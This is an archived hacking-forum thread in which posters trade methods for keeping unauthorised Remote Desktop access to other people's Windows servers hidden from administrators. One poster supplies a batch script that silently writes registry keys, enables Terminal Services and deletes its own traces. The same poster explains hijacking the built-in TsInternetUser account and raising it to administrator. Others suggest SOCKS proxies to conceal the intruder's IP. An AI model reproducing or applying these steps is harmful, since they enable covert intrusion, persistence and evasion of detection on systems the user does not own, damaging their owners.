hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant

poldi
HI.

Dou you know any way to hide a user so it wont show up in the list of currently connected clients ?

THX Poldi smile.gif
andydis
there was a npother thread on this, first off i dont think it can be done unless you somehow disable Terminal server manager ( i.e. sabotage the program on the server that lets them view connected clients, have a look for linked dll's or something)

2nd off this is a VERY BAD way to gain access to a system if its not yours, im sure others will agree?
ch0pper
3nd off this is a VERY BAD way to gain access to a system if its not yours, im sure others will agree?

sure it been done api hooking code not public but it can be done
brOmstar
i have some servers where i can access via ts since over a year and never had problems so why should this be a bad way this way rocks ? blink.gif
andydis
fine have it your way but you will end up getting BUSTED.

the idea to have full control over a box and not let the admin know obbiously doesnt appeal to you and u want to be known,
=k3Rn=
Hm i also thought about this.

Up to now i haven't used TS to control a host, also because i don't know how obvious the connection is ...

Where does the admin of the host can see that you are logged on?

You got two problems: First you have to create a user account (best admin) - this account can be found be the admin (won't it even be visible at next windows login screen?)
And second problem, when you connect using TS then i think the admin can also see that you are connected quite easily.

Would be cool if you post some comments.

Greetz
=k3Rn=
Erra
Why create your own account, why not just grab their existing admin account?

And, why connect to it with your own IP? I mean come on there are ways to use other IP's when connecting.

And how many admins do you know that sit there and check out who is logged in via TS? Im guessing not many, and if they do see you, it will be accidental I am sure.

But its a risk you take........ but then, accessing any machine illegally is a risk you take....

just be sensible and careful
=k3Rn=
QUOTE

Why create your own account, why not just grab their existing admin account?


I fthe admin is logged in, i think you can't login too using that account.

QUOTE

And, why connect to it with your own IP? I mean come on there are ways to use other IP's when connecting.


That is intresting, how do you want to use other ip numbers? A redirect over another host?
Please explain that.

Greetz
=k3Rn=
cranky
sockscap > *
Erra
Exactly, use sockscap....

And if the admin is logged in to the desktop, you can usually still use an RDP connection to log in unless they have set it as such that you cant.

But most admins dont do that
el33t
install socks inside the server, then connect to ts through itself by socks5, what ip will be shown in tsadmin?


127.0.0.1

LOL
seppel18
Use a Router or Switch on your PC! tongue.gif

Then the Terminal Service Manager on the Hacked Machine will Show your Internal IP (192.168.*.*)

(But the Admin Can still see your real IP with netstat)

Or Uninstall Terminal Services and Reinstall it with this .bat :

----------------------------------------
echo Windows Registry Editor Version 5.00> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]>> c:\TS.reg
echo "Start"=dword:00000002>> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]>>C:\TS.REG
echo "EnableAdminTSRemote"=dword:00000001>>C:\TS.REG
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>C:\TS.REG
echo "TSEnabled"=dword:00000001>>C:\TS.REG
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]>>C:\TS.REG
echo "Start"=dword:00000002>>C:\TS.REG
REGEDIT /S C:\TS.REG
echo [Components] > c:\bootlog~.txt
echo TSEnabled = on >> c:\bootlog~.txt
sysocmgr /i:%windir%\inf\sysoc.inf /u:c:\bootlog~.txt /q
DEL /Q c:\TS.REG
DEL /Q c:\bootlog~.txt
-----------------------------------------

Then Terminal Services will be Enabled without the Manager wink.gif
seppel18
QUOTE (=k3Rn= @ May 4 2004, 06:04 PM)
"First you have to create a user account (best admin) - this account can be found be the admin"


I usually use the already Created and unused "TsInternetUser" Account, change password, and elevate it to Administrator Group.

QUOTE (=k3Rn= @ May 4 2004, 06:04 PM)
"(won't it even be visible at next windows login screen?)"


No..cause you have your own Desktop, the Admin in front of the Monitor will see nothing. Thats so Great About Terminal Services wink.gif (Works only with Win2K-Server and Win2k3, NOT WinXP!!)

QUOTE (=k3Rn=)
I fthe admin is logged in, i think you can't login too using that account.


You Can!!
Kaaroth
cool the ts installation w/o manager ^^ thx
6066up9r
great suggestions, will certainly use them in the next admin session
Nessuno
about loggin in with the same user... if 2 boxes connect to the same server via ts with the same user i think they can see one the each other's desktop, or not?
i mean... like dntu mini remote ctrl (it isn't a perfect example), u interact with the other one logged in.
am i wrong?
or on ts u can login 10 person with the same user and have 10 different desktops?
sorry for my english if u don't understand i'll try to speak in a easy way smile.gifsmile.gif

have a nice day, byebye
seppel18
QUOTE (Nessuno @ May 6 2004, 06:54 AM)
am i wrong?


yeah

QUOTE
or on ts u can login 10 person with the same user and have 10 different desktops?


yap!

Terminal Services have nothing to do with DWRC,VNC,RAdmin,.....
Nessuno
ok tnx for the info rolleyes.gif
i'll never stop to learn wink.gif
bye have a nice day
Reaper527
QUOTE (seppel18 @ May 5 2004, 07:32 AM)
Use a Router or Switch on your PC!  tongue.gif

Then the Terminal Service Manager on the Hacked Machine will Show your Internal IP (192.168.*.*)

no, your internal IP is called that because its only seen internally on your network. any traffic to the internet goes through your router which gets it for you (so your routers IP aka your external IP) would be the one seen. if you don't belive me sit behind your router and go to a whatsmyip.com type of site. the IP you see won't begin with 192.168 smile.gif

great work on that bat though smile.gif that should be useful
jimmy
it can be done as well with windows XP btw ...
just a registry change
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.

 
Invision Power Board © 2001-2005 Invision Power Services, Inc.